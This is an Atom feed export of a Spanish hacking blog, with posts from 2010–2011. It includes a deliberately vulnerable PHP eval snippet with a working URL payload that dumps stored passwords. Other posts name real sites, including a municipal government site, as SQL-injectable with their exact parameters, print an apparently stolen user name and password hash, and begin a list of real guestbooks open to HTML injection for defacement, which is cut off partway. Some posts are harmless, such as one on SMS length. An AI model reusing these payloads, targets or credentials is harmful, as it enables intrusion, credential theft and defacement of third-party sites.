<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1031582156912374124</id><updated>2012-02-16T07:02:57.592-08:00</updated><category term='Python'/><category term='L.F.I'/><category term='Python Manuales'/><category term='DDoS'/><category term='Protocolos'/><category term='Captcha'/><category term='Deface'/><category term='Mysql'/><category term='Sqli'/><category term='Res Hacker'/><category term='Foot Tampering'/><category term='HRiskTs'/><category term='BSQLi'/><category term='Windows'/><category term='Cosmologia'/><category term='K0D4K'/><category term='Papers'/><category term='Informatica forense'/><category term='Proyectos'/><category term='PHP'/><category term='Scripting'/><category term='bugsnivelweb'/><category term='Bugs'/><category term='Http'/><category term='Labs'/><category term='Noticias'/><category term='Wargames'/><category term='HTML'/><category term='Tools'/><category term='Seguridad'/><category term='Hacking'/><category term='XSS'/><category term='Facebook'/><category term='Telefonia'/><title type='text'>[H] Risk T [S]</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>35</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-6330698861535558013</id><published>2011-06-09T19:07:00.000-07:00</published><updated>2011-06-09T19:07:17.322-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='Mysql'/><title type='text'>Connection Hijacking</title><content type='html'>Bueno, despues de mucho tiempo, vuelvo a postear un poco de contenido en este blog que lo tuve abandonado por un largo tiempo. Hoy, veremos la importancia que tiene la funcion mysql_close() al momento de cerrar una conexion MySql con PHP. Algunos admins por no decir la mayoria, no lo usan ya que piensan que la conexion, se cierra completamente al final el script, y muchos otros no le dan importancia.&lt;br /&gt;&lt;br /&gt;Primeramente, como es de esperar, nos veremos con el &lt;b&gt;&lt;span style="color: red;"&gt;code vulnerable:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;!--?php&lt;br--&gt;$la = $_GET['v'];&lt;br /&gt;$server='localhost';&lt;br /&gt;$user='root';&lt;br /&gt;$pass='';&lt;br /&gt;$db='alumnos';&lt;br /&gt;&lt;br /&gt;$conexion=mysql_connect($server,$user,$pass)&lt;br /&gt;or die("Problemas en la conexion");&lt;br /&gt;mysql_select_db($db,$conexion);&lt;br /&gt;&lt;br /&gt;if(mysql_query('select * from users where d=1'))&amp;nbsp;&amp;nbsp; &amp;nbsp;{&lt;br /&gt;echo "Consulta ejecutada";&lt;br /&gt;}else&amp;nbsp;&amp;nbsp; &amp;nbsp;{&lt;br /&gt;echo "No se pudo ejecutar la consulta";&lt;br /&gt;&amp;nbsp;&amp;nbsp; &amp;nbsp;}&lt;br /&gt;if(isset($la)) {&lt;br /&gt;&lt;br /&gt;eval($la);&lt;br /&gt;&amp;nbsp;}?&amp;gt;&lt;br /&gt;&lt;br /&gt;En este caso particular, como no se ha cerrado la conexion SQL y tampoco ha finalizado el script, todavia se puede hacer uso productivo de la conexion SQL. ¿Que podemos hacer?&lt;br /&gt;Simple, lo que la imaginacion nos de :)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;http://localhost/la.php?v=$sql=mysql_query('select * from users'); while($r=mysql_fetch_assoc($sql)) { echo "&lt;br /&gt;".$r['name']." ".$r['password']."&lt;br /&gt;";}&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Una screen de lo que devuelve al ejecutar esa URI&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img18.imageshack.us/img18/6720/pruebamk.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="300" src="http://img18.imageshack.us/img18/6720/pruebamk.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Fuente: &lt;a href="http://yoyahack.blogspot.com/search/label/php"&gt;http://yoyahack.blogspot.com/search/label/php&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Saludos &lt;span style="font-size: small;"&gt;&lt;b style="color: red; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;"&gt;Dr [F] &lt;/b&gt;&lt;/span&gt;&lt;span id="goog_821941418"&gt;&lt;/span&gt;&lt;span id="goog_821941419"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-6330698861535558013?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/6330698861535558013/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2011/06/connection-hijacking.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/6330698861535558013'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/6330698861535558013'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2011/06/connection-hijacking.html' title='Connection Hijacking'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-2261267132273445659</id><published>2010-08-31T16:58:00.000-07:00</published><updated>2010-08-31T17:08:48.048-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PHP'/><category scheme='http://www.blogger.com/atom/ns#' term='Tools'/><title type='text'>Mult1 Converter</title><content type='html'>r Mult1 Converter, es una tool creada por mi para simplificar el manejo de encriptaciones de cadenas alfanumericas, esta misma, esta hecha en PHP. y es muy simple de comprender, no pretendan grandes cosas la hize en 25 minutos jaja.. sin mas preambulo, les dejo el code :)&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;&lt;a href="http://pastebin.com/sFZf8DTq"&gt;http://pastebin.com/sFZf8DTq&amp;nbsp;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img713.imageshack.us/img713/3415/multip.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://img713.imageshack.us/img713/3415/multip.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Por favor en caso de uso, respetar los derechos de autor :)&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Saludos&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: right;"&gt;&lt;b&gt;Dr [F]&lt;/b&gt;&lt;b&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-2261267132273445659?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/2261267132273445659/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/mult1-converter.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2261267132273445659'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/2261267132273445659'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/mult1-converter.html' title='Mult1 Converter'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-7581563415640497156</id><published>2010-08-31T13:28:00.000-07:00</published><updated>2010-08-31T13:28:25.356-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='Wargames'/><title type='text'>Reto Hackertest !</title><content type='html'>&lt;div style="color: black;"&gt;&lt;b&gt;Hola a todos, les dejo aqui un pequeño  paper, de como pasar hasta el nivel 15 (por que me dio pereza escribir)  los retos de hackertest&lt;/b&gt;&lt;/div&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="color: black;"&gt;&lt;b&gt;Nunca esta demas  aclarar que hackertest, es un wargame para novatos, los de medio y alto  nivel no se gasten haciendo estos a menos que esten aburridos. Mas  adelante, yo mismo hare un wargame, pero con casos reales jaja..&lt;/b&gt;&lt;/div&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;Saludos&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Se los dejo en un .txt, para  que no haya problemas, saludos :)&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.blogger.com/goog_679865557"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://www.megaupload.com/?d=9DHR22EZ"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Megaupload !&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: right;"&gt;&lt;span style="color: red;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-7581563415640497156?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/7581563415640497156/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/reto-hackertest.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/7581563415640497156'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/7581563415640497156'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/reto-hackertest.html' title='Reto Hackertest !'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-1154100238744250207</id><published>2010-08-27T02:47:00.000-07:00</published><updated>2010-08-27T02:47:55.945-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='BSQLi'/><category scheme='http://www.blogger.com/atom/ns#' term='Papers'/><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>Blind SQLi</title><content type='html'>&lt;div style="color: red; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Blind SQLi&amp;nbsp;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Ataque a ciegas de inyeccion SQL. Es una tecnica de ataque que utiliza inyeccion sql. Cuando una web por motivos de seguridad no muestra mensajes de error de la base de datos, al no devolver informacion se muestra siempre el mismo contenido (y solo se mostrara el poco contenido que hay si el resultado es correcto)&lt;br /&gt;&lt;br /&gt;Los administradores de los sitios desactivan el SHOW_ERRORS y SHOW_WARNINGS para que no se muestren posibles erorres provocados en el interprete Sql. Estos errores son utilizado por SqLi para obtener informacion para concretar dicho ataque.&lt;br /&gt;En Sqli podemos atacar sin necesidad de esta informacion. Una aplicacion web recibe datos desde el cliente. Los datos que realizamos en id en el caso de este tutorial, se utilizan para construir la consulta Sql.&lt;br /&gt;En una SQLi normal cuando enviamos en la variable vulnerable la consulta nos imprime el resultado. Pero en BSQLi no nos imprime nada. Apartir de si muestra informacion o no muestra, inyectamos valores true o false.&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red;"&gt;&lt;b&gt;Fuente: Wikipedia&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;PD: Con el tutorial lo van a entender mejor..&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b style="font-family: Arial,Helvetica,sans-serif;"&gt;&lt;a href="http://www.megaupload.com/?d=L2757FCM" style="color: red;"&gt;Descarga AQUI &lt;/a&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;Saludos&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;b style="color: red;"&gt;Dr [F]&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-1154100238744250207?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/1154100238744250207/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/blind-sqli.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1154100238744250207'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/1154100238744250207'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/blind-sqli.html' title='Blind SQLi'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-8299233841347393361</id><published>2010-08-25T15:26:00.000-07:00</published><updated>2010-08-25T15:26:04.814-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Telefonia'/><title type='text'>¿Por que los sms permiten 160 caracteres?</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;¿Por que los sms permiten 160 caracteres? &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;La razon por que los mensajes &lt;span style="color: red;"&gt;no pueden exceder los 160 caracteres de longitud&lt;/span&gt;. Al parecer, en sus comienzos los sms se pensaron como mensajes de control, no como un servicio a disposicion del usuario y de hecho van por canales de control y no por los de voz.&lt;br /&gt;&lt;br /&gt;La inclusion de SMS estaba apunto de ser una idea que estaba apunto de ser descartada de las especificaciones GSM ya que no se le veia ningun futuro. jajaja. Parecido a los que decian que internet no iba a tener futuro jajaj.&lt;br /&gt;&lt;br /&gt;De hecho el estándar permite 140 bytes de "user data" o "payload". Para  aprovecharlos mejor, se usa una codificación de 7 bits por carácter, con  lo cual de los &lt;b style="color: red;"&gt;140 * 8 = 1120 bits te salen 1120 / 7 = 160 caracteres  codificados en 7 bits.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Otro dato de interés es que los SMS provocaron la caída de la red GSM en  múltiples ocasiones puesto que los enlaces troncales de señalización  eran de muy bajo tráfico. El caso es que como nadie se esperaba el éxito  de los mensajitos cortos, éstos colapsaron el medio y por tanto los  teléfonos dejaron de funcionar. Por esta razón hubo que redimensionar la  red de señalización.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: red;"&gt;Fuente: &lt;/span&gt;&lt;/b&gt;&lt;undersec&gt; &lt;/undersec&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-8299233841347393361?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/8299233841347393361/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/por-que-los-sms-permiten-160-caracteres.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8299233841347393361'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/8299233841347393361'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/por-que-los-sms-permiten-160-caracteres.html' title='¿Por que los sms permiten 160 caracteres?'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-4019154319154588220</id><published>2010-08-22T18:01:00.000-07:00</published><updated>2010-08-23T10:32:28.831-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HRiskTs'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>SQLi  | www.urdinarrain.gov.ar</title><content type='html'>&lt;div style="text-align: center;"&gt;Vulnerabilidades de tipo iSql encontradas en &lt;a href="http://www.urdinarrain.gov.ar/"&gt;www.urdinarrain.gov.ar&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: black; text-align: center;"&gt;&lt;b&gt;Variable vulnerable en iSql: &lt;span style="color: red;"&gt;http://www.urdinarrain.gov.ar/noticias/noticias.php?id='&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_eBcvsaKjQp4/THHH69MYLCI/AAAAAAAAAKQ/Qsdezgj2sgw/s1600/f_15oooje9kjsm_d8840b8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_eBcvsaKjQp4/THHH69MYLCI/AAAAAAAAAKQ/Qsdezgj2sgw/s320/f_15oooje9kjsm_d8840b8.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Fecha de reportaje: &lt;span style="color: black;"&gt;22/8&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Reportador:  &lt;span style="color: black;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;span style="color: red;"&gt;Descubierto  por:&lt;/span&gt; Sthefano02 &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Tipo de vulnerabilida:&lt;span style="color: black;"&gt; iSql&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Tambien la web es vulnerable a XSS que se da por la mala validacion de entradas en el buscador :)&lt;/div&gt;&lt;div style="text-align: center;"&gt;saludos&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;b style="color: red;"&gt;Dr [F]&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-4019154319154588220?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/4019154319154588220/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqi-wwwurdinarraingovar.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/4019154319154588220'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/4019154319154588220'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqi-wwwurdinarraingovar.html' title='SQLi  | www.urdinarrain.gov.ar'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_eBcvsaKjQp4/THHH69MYLCI/AAAAAAAAAKQ/Qsdezgj2sgw/s72-c/f_15oooje9kjsm_d8840b8.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-3975026787586994482</id><published>2010-08-21T21:46:00.000-07:00</published><updated>2010-08-22T07:01:26.411-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='bugsnivelweb'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Sqli'/><title type='text'>SQLi | www.preserveplanet.org</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;b&gt;Sitio vulnerable a SQL Injection www.preservplanet.org&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Fecha de reportaje: &lt;span style="color: black;"&gt;22/8&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Hora del reporte: &lt;span style="color: black;"&gt;1.40 am&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Reportador: &lt;span style="color: black;"&gt;Dr [F]&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;span style="color: red;"&gt;Descubierto por:&lt;/span&gt; Sthefano02 &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Mail de reporte: &lt;span style="color: black;"&gt;luisdiego@preservplanet.org&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style="color: red; text-align: center;"&gt;&lt;b&gt;Tipo de vulnerabilida:&lt;span style="color: black;"&gt; iSql&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;Variable vulnerable: &lt;b&gt;&lt;span style="color: red;"&gt;http://www.preserveplanet.org/spanish/noticias.php?id=&lt;/span&gt;&lt;/b&gt;'&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;User:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;mushroom87&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;b style="color: red;"&gt;Password:&lt;/b&gt; &lt;b&gt;510b6e7391dc97ba86de431fb1bbe478&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_eBcvsaKjQp4/THCrThb1k2I/AAAAAAAAAKI/1nXdi2y0qp4/s1600/f_15oooje9kjsm_d8840b8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="273" src="http://2.bp.blogspot.com/_eBcvsaKjQp4/THCrThb1k2I/AAAAAAAAAKI/1nXdi2y0qp4/s320/f_15oooje9kjsm_d8840b8.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;b style="color: red;"&gt;Dr [F]&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1031582156912374124-3975026787586994482?l=high-risk-team.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://high-risk-team.blogspot.com/feeds/3975026787586994482/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqi-wwwpreserveplanetorg.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3975026787586994482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1031582156912374124/posts/default/3975026787586994482'/><link rel='alternate' type='text/html' href='http://high-risk-team.blogspot.com/2010/08/sqi-wwwpreserveplanetorg.html' title='SQLi | www.preserveplanet.org'/><author><name>Franco di</name><uri>http://www.blogger.com/profile/08925043126018389795</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_eBcvsaKjQp4/THCrThb1k2I/AAAAAAAAAKI/1nXdi2y0qp4/s72-c/f_15oooje9kjsm_d8840b8.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1031582156912374124.post-4575969362253421216</id><published>2010-08-21T21:18:00.000-07:00</published><updated>2010-08-21T21:18:06.167-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Deface'/><category scheme='http://www.blogger.com/atom/ns#' term='HTML'/><title type='text'>Libros de visita vulnerables a HTML Injection</title><content type='html'>Bueno, aqui les dejo un listado de 63 webs vulnerables a HTML Injection. Esta vulnerabilidad consta en, al estar activado la introduccion de codigo HTML en los comentarios, puedan aprovecharse para redireccionamientos, y otras cosas.&lt;br /&gt;&lt;br /&gt;Ni mas ni menos, aqui se las dejo:&lt;br /&gt;&lt;br /&gt;1 &lt;a class="bbc_link new_win" href="http://www.espacom.com.br/guestbook/" target="_blank"&gt;http://www.espacom.com.br/guestbook/&lt;/a&gt;&lt;br /&gt;2 &lt;a class="bbc_link new_win" href="http://www.agapefm.com.br/recado/" target="_blank"&gt;http://www.agapefm.com.br/recado/&lt;/a&gt;&lt;br /&gt;3 &lt;a class="bbc_link new_win" href="http://djguillermos.com/guestbook/" target="_blank"&gt;http://djguillermos.com/guestbook/&lt;/a&gt;&lt;br /&gt;4 &lt;a class="bbc_link new_win" href="http://www.tiburcioflauta.com/librovisitasonline/" target="_blank"&gt;http://www.tiburcioflauta.com/librovisitasonline/&lt;/a&gt;&lt;br /&gt;5 &lt;a class="bbc_link new_win" href="http://elplumero.es/guestbook/" target="_blank"&gt;http://elplumero.es/guestbook/&lt;/a&gt;&lt;br 